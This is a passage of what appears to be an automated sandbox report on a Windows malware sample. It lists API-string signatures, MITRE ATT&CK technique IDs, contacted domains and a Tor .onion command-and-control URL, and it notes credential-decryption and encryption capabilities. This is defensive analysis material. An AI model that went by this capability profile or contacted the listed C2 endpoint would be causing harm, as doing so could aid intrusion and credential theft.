\"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-437", "type": 2, "relevance": 1, "name": "Contains ability to retrieve token privileges information (API string)", "description": "Found reference to API \"CheckTokenMembership\" (Indicator: \"CheckTokenMembership\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "Ransomware/Banking", "identifier": "string-553", "type": 2, "relevance": 1, "name": "Contains ability to modify file system redirection (API string)", "description": "Found reference to API \"Wow64RevertWow64FsRedirection\" (Indicator: \"Wow64RevertWow64FsRedirection\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"Wow64DisableWow64FsRedirection\" (Indicator: \"Wow64DisableWow64FsRedirection\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}, {"threat_level_human": "informative", "category": "Ransomware/Banking", "identifier": "string-541", "type": 2, "relevance": 1, "name": "Contains ability to create/switch the desktop (API string)", "description": "Found reference to API \"CreateDesktopA\" (Indicator: \"CreateDesktop\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"/n.me\"\n Heuristic match: \"api.ipify.org\"\n Heuristic match: \"time-a.nist.gov\"\n Pattern match: \"https://api.ipify.org/\"\n Heuristic match: \".onion\"\n Heuristic match: \"time-a-g.nist.gov\"\n Heuristic match: \"time.nist.gov\"\n Pattern match: \"http://uyhmgnbvue5j5dbw.onion/kpanel/connect.php\"\n Pattern match: \"https://sabotage.net\"\n Heuristic match: \"k,220.iq\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-228", "type": 2, "relevance": 1, "name": "Contains ability to communicate with C2 using Sockets (API string)", "description": "Found reference to API \"WSAStartup failed: %d\" (Indicator: \"WSAStartup\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-537", "type": 2, "relevance": 1, "name": "Contains ability to create a new HTTP request (API string)", "description": "Found reference to API \"HttpOpenRequest failed with error: %d\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"HttpOpenRequestW\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"https://api.ipify.org/get\" - Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp\")\n Found URL \"https://http://hostincorrect\" - Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp\")\n Found URL \"http://uyhmgnbvue5j5dbw.onion/kpanel/connect.phpu1.<IPv4>.1.311.10.1u1.2.840.113549.3.2u1.2.840.113549.1.9.15u1.<IPv4>.5.7.1.3u1.2.840.113549.1.9.5u1.<IPv4>.1.311.13.2.1u1.<IPv4>.1.311.13.2.2u1.<IPv4>.1.311.10.9.1u1.<IPv4>.1.311.21.7u1.<IPv4>.<IPv4>.1u1.<IPv4>.5.7.1.12u1.<IPv4>.5.7.1.2u1.2.840.10045.4.3u1.2.840.10045.2.1u1.2.840.113549.1.1.10u1.2.840.113549.1.1.7u1.<IPv4>.5.7.2.2u1.<IPv4>.5.7.1.1u1.<IPv4>.5.7.1.11u1.<IPv4>.1.311.2.1.14u1.2.840.113549.1.9.14u1.<IPv4>.1.311.10.2u1.<IPv4>.1.311.10.1u1.2.840.113549.3.2u1.2.840.113549.1.9.15u1.<IPv4>.5.7.1.3u1.2.840.113549.1.9.5u1.<IPv4>.1.311.13.2.1u1.<IPv4>.1.311.13.2.2u1.<IPv4>.1.311.10.9.1u1.<IPv4>.1.311.21.7u1.<IPv4>.<IPv4>.1u1.<IPv4>.5.7.1.12u1.<IPv4>.5.7.1.2u1.2.840.10045.4.3u2.5.29.10u2.5.29.15u2.5.29.19u2.5.29.32u2.5.29.3u2.5.29.35u2.5.29.14u2.5.29.17u2.5.29.18u2.5.29.21u2.5.29.31u2.5.29.37u2.5.29.20u2.5.29.27u2.5.29.28u2.5.29.46u2.5.29.30u2.5.29.33u2.5.29.5u2.5.29.36u2.5.29.54u1.<IPv4>.7u1.<IPv4>.7comspec=c:\\windows\\system32\\cmd.exetmp=c:\\users\\hapubws\\appdata\\local\\tempcomspec=c:\\windows\\system32\\cmd.exetmp=c:\\users\\hapubws\\appdata\\local\\tempu2.16.840.1.113733.1.7.1.1u1.<IPv4>.1.311.10.11.85u1.2.840.10045.2.1u1.2.840.113549.1.1.10u1.2.840.113549.1.1.7u1.2.840.113549.3.7u1.2.840.113549.3.2u1.2.840.113549.3.4u1.2.840.113549.1.1.1u1.2.840.113549.3.7u1.2.840.113549.3.2u1.2.840.113549.3.4appdata=c:\\users\\hapubws\\appdata\\roaminglocalappdata=c:\\users\\hapubws\\appdata\\localtemp=c:\\users\\hapubws\\appdata\\local\\tempappdata=c:\\users\\hapubws\\appdata\\roaminglocalappdata=c:\\users\\hapubws\\appdata\\localtemp=c:\\users\\hapubws\\appdata\\local\\temp00000000000000000001hb\\uhb\\ucertdllverifycertificatechainpolicycryptmsgdllcnggencontentencryptkeycryptmsgdllcngimportcontentencryptkeyn30'w0*/homedrive=c:os=windows_ntsystemdrive=c:xv0u8xvxu8w\" - Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp\")\n Found URL \"https://api.ipify.org/get\" - Source: \"00000000-00001188.00000000.296751.00400000.00000040.mdmp\")\n Found URL \"https://http://hostincorrect\" - Source: \"00000000-00001188.00000000.296751.00400000.00000040.mdmp\")\n Found URL \"http://https://hosthttp/1.1http/1.0gzipget\" - Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found URL \"https://api.ipify.org/get\" - Source: \"00000000-00001188.00000001.298674.002F0000.00000004.mdmp\")\n Found URL \"https://http://hostincorrect\" - Source: \"00000000-00001188.00000001.298674.002F0000.00000004.mdmp\")\n Found URL \"http://uyhmgnbvue5j5dbw.onion/kpanel/connect.php%seep\" - Source: \"00000000-00001188.00000001.298674.002F0000.00000004.mdmp\")\n Found URL \"https://sabotage.net\" - Source: \"00000000-00001188.00000001.298674.002F0000.00000004.mdmp\")\n Found URL \"https://api.ipify.org/get\" - Source: \"00000000-00001188.00000001.298674.00400000.00000040.mdmp\")\n Found URL \"https://http://hostincorrect\" - Source: \"00000000-00001188.00000001.298674.00400000.00000040.mdmp\")\n Found URL \"https://api.ipify.org/get\" - Source: \"00000000-00001188.00000002.300597.002F0000.00000004.mdmp\")\n Found URL \"https://http://hostincorrect\" - Source: \"00000000-00001188.00000002.300597.002F0000.00000004.mdmp\")\n Found URL \"http://uyhmgnbvue5j5dbw.onion/kpanel/connect.php%seep\" - Source: \"00000000-00001188.00000002.300597.002F0000.00000004.mdmp\")\n Found URL \"https://sabotage.net\" - Source: \"00000000-00001188.00000002.300597.002F0000.00000004.mdmp\")\n Found URL \"https://api.ipify.org/get\" - Source: \"00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found URL \"https://http://hostincorrect\" - Source: \"00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"WSAStartup failed: %d\" (Indicator: \"WSAStartup\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"HttpOpenRequest failed with error: %d\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"HttpSendRequest failed with error: %d\" (Indicator: \"HttpSendRequest\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"HttpQueryInfoA\" (Indicator: \"HttpQueryInfo\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"HttpQueryInfoW\" (Indicator: \"HttpQueryInfo\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"InternetReadFileExA\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"InternetReadFileExW\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"HttpSendRequestExA\" (Indicator: \"HttpSendRequest\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"HttpSendRequestExW\" (Indicator: \"HttpSendRequest\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"HttpSendRequestW\" (Indicator: \"HttpSendRequest\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"HttpOpenRequestW\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"InternetConnectW\" (Indicator: \"InternetConnect\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"InternetOpenW\" (Indicator: \"InternetOpen\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-457", "type": 2, "relevance": 1, "name": "Found string related to HTTP headers", "description": "Found string \"GET %s HTTP/1.0\" (Indicator: \"HTTP/1.0\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"POST %s HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"GET %s HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"HTTP/1.0\" (Indicator: \"HTTP/1.0\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-241", "type": 2, "relevance": 1, "name": "Contains ability to download a file from a URL (API string)", "description": "Found reference to API \"InternetReadFileExA\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"InternetReadFileExW\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-538", "type": 2, "relevance": 1, "name": "Contains ability to create a HTTP or FTP session (API string)", "description": "Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"InternetConnectW\" (Indicator: \"InternetConnect\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "details too long to display", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-176", "type": 2, "relevance": 1, "name": "Contains Tor Onion URL", "description": "\".onion\" (Indicator: \".onion\") in Source: 00000000-00001188.00000000.296751.002F0000.00000004.mdmp\n 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.002F0000.00000004.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.002F0000.00000004.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp\n \"http://uyhmgnbvue5j5dbw.onion/kpanel/connect.php\" (Indicator: \".onion\") in Source: 00000000-00001188.00000000.296751.002F0000.00000004.mdmp\n 00000000-00001188.00000001.298674.002F0000.00000004.mdmp\n 00000000-00001188.00000002.300597.002F0000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1090.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090/003"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-419", "type": 2, "relevance": 1, "name": "Contains ability to open a port and listen for incoming connection (API string)", "description": "Found reference to API \"setsockopt failed\" (Indicator: \"setsockopt\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"setsockopt\" (Indicator: \"setsockopt\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"rfbCheckFds: setsockopt\" (Indicator: \"setsockopt\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-539", "type": 2, "relevance": 1, "name": "Contains reference to Windows internet services (API string)", "description": "Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found reference to API \"InternetOpenW\" (Indicator: \"InternetOpen\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-314", "type": 2, "relevance": 1, "name": "Contains ability to retrieve internet settings (API string)", "description": "Found reference to API \"InternetQueryOptionA\" (Indicator: \"InternetQueryOption\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-81", "type": 7, "relevance": 5, "name": "High entropy domain detected", "description": "Contacted domain: \"time-a.nist.gov\" has high entropy", "origin": "Network Traffic", "attck_id": "T1568.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568/002"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-55", "type": 7, "relevance": 1, "name": "JA3 SSL client fingerprint", "description": "Observed JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d\n Observed JA3 fingerprint: 8c4a22651d328568ec66382a84fc505f", "origin": "Network Traffic"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "summary-27", "type": 15, "relevance": 2, "name": "Shows ability to send encrypted data to the internet", "description": "Sample contains ability to use Microsoft's Enhanced Cryptographic Provider APIs and contains ability to communicate with network", "origin": "Indicator Combinations", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-213", "type": 2, "relevance": 1, "name": "Contains ability to encrypt/encode message (API string)", "description": "Found reference to API \"CryptStringToBinaryA\" (Indicator: \"CryptStringToBinary\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "api-229", "type": 6, "relevance": 3, "name": "Calls an API typically used to convert data from string to binary", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"CryptStringToBinaryA\" (UID: 00000000-00001188)", "origin": "API Call", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "stream-139", "type": 1, "name": "Contains XOR operation loops [Stream disassembly]", "description": "Assembly shows XOR instruction xor byte ptr [ecx+ebx]\n al in Stream UID: 35550-1-00401698", "origin": "Hybrid Analysis Technology", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-212", "type": 2, "relevance": 1, "name": "Contains ability to perform decryption (API string)", "description": "Found reference to API \"Failed to CryptUnprotectData: error = %d\" (Indicator: \"CryptUnprotectData\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CryptUnprotectData error: %d\" (Indicator: \"CryptUnprotectData\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CryptDecrypt\" (Indicator: \"CryptDecrypt\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CryptUnprotectData\" (Indicator: \"CryptUnprotectData\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.981273953690725", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains ability to encrypt/encode message (API string)\n Matched sigs: Contains ability to import cryptographic keys (seen in ransomware)\n Matched sigs: Contains CRYPTO related strings\n Matched sigs: Contains ability to attach base64 encoded attachment to an email\n Matched sigs: Reads the cryptographic machine GUID\n Matched sigs: Contains XOR operation loops [Stream disassembly]\n Matched sigs: YARA signature match - AES encryption\n Matched sigs: Contains ability to use Cryptographic classes\n Matched sigs: Contains ability to perform Base64 encoding/decoding\n Matched sigs: Contains ability to perform decryption (API string)\n Matched sigs: Contains ability to use Microsoft's Enhanced Cryptographic Provider\n Matched sigs: Sample file has high entropy (likely encrypted/compressed content)", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: Contains XOR operation loops [Stream disassembly]\n Matched sigs: YARA signature match - AES encryption\n Matched sigs: Found potential URL in binary/memory\n Matched sigs: Contains ability to create a new HTTP request (API string)\n Matched sigs: Found potential URLs in memory dumps\n Matched sigs: Contains ability to communicate with network (API string)\n Matched sigs: Contains ability to create a HTTP or FTP session (API string)\n Matched sigs: Spawned process connects to a network\n Matched sigs: Found potential IP address in binary/memory\n Matched sigs: Contacts server", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains ability to attach base64 encoded attachment to an email\n Matched sigs: Contains XOR operation loops [Stream disassembly]\n Matched sigs: YARA signature match - AES encryption\n Matched sigs: Contains ability to perform Base64 encoding/decoding", "origin": "Indicator 